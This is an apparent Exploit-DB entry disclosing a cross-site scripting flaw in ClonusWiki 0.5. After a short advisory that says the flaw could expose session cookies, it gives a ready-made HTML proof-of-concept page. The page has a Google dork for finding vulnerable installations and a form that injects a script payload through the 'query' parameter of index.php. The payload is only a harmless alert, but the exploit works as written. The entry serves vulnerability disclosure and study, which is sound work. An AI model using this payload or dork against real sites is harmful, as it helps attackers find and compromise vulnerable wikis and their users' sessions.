ClonusWiki 0.5 Index.PHP HTML Injection Vulnerability

ID EDB-ID:30070
Type exploitdb
Reporter John Martinelli
Modified 2007-05-22T00:00:00


ClonusWiki 0.5 Index.PHP HTML Injection Vulnerability. Webapps exploit for php platform


ClonusWiki is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.

Attacker-supplied HTML and script code would run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.

This issue is reported to affect ClonusWiki 0.5.

<head><title>ClonusWiki .5 - Cross-Site Scripting Vulnerability</title><body>
<font size=4>ClonusWiki .5 - Cross-Site Scripting Vulnerability</font><br>
<font size=3>discovered by <a href="">John Martinelli</a> of <a
href="">RedLevel Security</a><br><br>
Google d0rk: <a href="">"ClonusWiki
.5" intitle:"ClonusWiki"</a>

<center>file <b>index.php</b> - variable <b>query</b> - method <b>get</b></center><br>
<form action="" method="get">
<input size=75 name="query" value=">"><script>alert(1)</script>">
<input type="hidden" name="action" value="search">
<input type=submit value="Execute XSS Attack" class="button">